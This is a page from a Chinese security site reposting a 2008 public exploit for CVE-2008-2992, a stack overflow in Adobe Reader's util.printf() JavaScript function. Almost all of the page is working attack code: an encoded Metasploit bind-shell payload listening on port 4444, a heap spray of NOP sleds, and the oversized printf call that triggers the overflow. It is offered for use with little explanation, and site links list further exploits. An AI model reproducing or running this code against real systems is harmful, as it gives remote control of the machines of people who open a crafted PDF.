首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
来源:www.hackingspirits.com 作者:Mohanty 发布时间:2008-11-06  
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992

Thanks to coresecurity for the technical background.

6Nov,2008: Exploit released by me

Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================

//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com


// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com

var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");

//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;

// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHPX 3.5.16 (news_id) Remote S
·Simple Machines Forum <= 1.1.6
·e-Vision CMS <= 2.0.2 Multiple
·VLC Media Player < 0.9.6 .RT S
·Simple Machines Forum (SMF) 1.
·GE Proficy Real Time Informati
·TR News <= 2.1 (login.php) Rem
·MemHT Portal <= 4.0 Remote Cod
·Mambo Component n-form (form_i
·deV!Lz Clanportal [DZCP] <= 1
·Chipmunk CMS (reguser.php) Add
·PhpCms2007 sp6 SQL injection 0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved